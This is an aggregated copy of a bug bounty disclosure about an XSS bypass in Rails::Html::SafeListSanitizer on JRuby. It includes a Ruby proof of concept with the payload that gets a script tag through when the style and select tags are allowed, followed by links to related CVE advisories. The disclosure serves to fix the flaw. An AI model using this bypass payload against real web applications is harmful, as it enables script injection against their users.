Lucene search
WindshockH1:1530898HistoryApr 05, 2022 - 7:34 a.m.
Ruby on Rails: Rails::Html::SafeListSanitizer vulnerable to xss attack in an environment that allows the style tag
2022-04-0507:34:03
windshock
hackerone.com
22
ruby on rails
html
safelistsanitizer
nokogiri
java
xss
vulnerability
bugbounty
EPSS
0.001
Percentile
47.4%
It seems to be a problem caused by a difference between the nokogiri java implementation and the ruby implementation.
It seems to be an ambiguous case as to whether to do it with nokogiri or have rails-html-sanitizer defend it.
jruby9.3.3.0 (nokogiri java), use Rails::Html::SafeListSanitizer.new.sanitize, allow select/style tag
code
tags = %w(select style)
puts "------------------------------------------------------------------"
puts "use Rails::Html::SafeListSanitizer.new.sanitize, allow select/style tag"
puts "input: <select<style/>W<xmp<script>alert(1)</script>"
puts "output: "+Rails::Html::SafeListSanitizer.new.sanitize("<select<style/>W<xmp<script>alert(1)</script>", tags: tags).to_s
puts "------------------------------------------------------------------"
result
input: <select<style/>W<xmp<script>alert(1)</script>
scrub --> node type :Nokogiri::XML::Text, node name :text, node to_s :W
scrub --> node type :Nokogiri::XML::Text, node name :text, node to_s :<script>alert(1)</script>
scrub --> node type :Nokogiri::XML::Element, node name :xmp, node to_s :<xmp><script>alert(1)</script></xmp>
scrub --> node type :Nokogiri::XML::Element, node name :style, node to_s :<style>W<script>alert(1)</script></style>
scrub --> node type :Nokogiri::XML::Element, node name :select, node to_s :<select><style>W<script>alert(1)</script></style></select>
output: <select><style>W<script>alert(1)</script></style></select>
Impact
It is possible to bypass Rails::Html::SafeListSanitizer filtering and perform an XSS attack.
Related
osv
osv
CVE-2022-32209
2022-06-24 15:15:11
ruby-rails-html-sanitizer - security update
2022-12-07 00:00:00
Rails::Html::Sanitizer vulnerable to Cross-site Scripting
2022-06-25 00:00:54
veracode
veracode
Cross-site Scripting (XSS)
2022-07-06 06:09:21
openvas
openvas
prion
prion
Design/Logic Flaw
2022-06-24 15:15:00
Design/Logic Flaw
2022-12-14 18:15:00
nvd
nvd
CVE-2022-32209
2022-06-24 15:15:11
CVE-2022-23520
2022-12-14 18:15:17
github
github
Rails::Html::Sanitizer vulnerable to Cross-site Scripting
2022-06-25 00:00:54
cve
cve
CVE-2022-32209
2022-06-24 15:15:11
CVE-2022-23520
2022-12-14 18:15:17
ubuntucve
ubuntucve
CVE-2022-32209
2022-06-24 00:00:00
CVE-2022-23520
2022-12-14 00:00:00
fedora
fedora
[SECURITY] Fedora 35 Update: rubygem-rails-html-sanitizer-1.4.3-1.fc35
2022-08-14 03:02:09
[SECURITY] Fedora 36 Update: rubygem-rails-html-sanitizer-1.4.3-1.fc36
2022-08-14 02:38:21
nessus
nessus
Debian DLA-3227-1 : ruby-rails-html-sanitizer - LTS security update
2022-12-07 00:00:00
Fedora 40 : rubygem-rails-html-sanitizer (2023-91e69ea326)
2024-04-29 00:00:00
cnvd
cnvd
Rails Cross-Site Scripting Vulnerability (CNVD-2022-58235)
2022-06-28 00:00:00
hackerone
hackerone
debian
debian
[SECURITY] [DLA 3227-1] ruby-rails-html-sanitizer security update
2022-12-06 19:02:47
[SECURITY] [DLA 3566-1] ruby-rails-html-sanitizer security update
2023-09-13 15:09:12
redhatcve
redhatcve
CVE-2022-32209
2022-06-28 16:06:33
suse
suse
Security update for rubygem-rails-html-sanitizer (moderate)
2022-08-23 00:00:00
cvelist
cvelist
CVE-2022-32209
2022-06-24 00:00:00
rubygems
rubygems
debiancve
debiancve
CVE-2022-32209
2022-06-24 15:15:11
CVE-2022-23520
2022-12-14 18:15:17
rocky
rocky
Satellite 6.12 Release
2022-11-16 13:21:30
redhat
redhat
(RHSA-2022:8506) Important: Satellite 6.12 Release
2022-11-16 13:21:30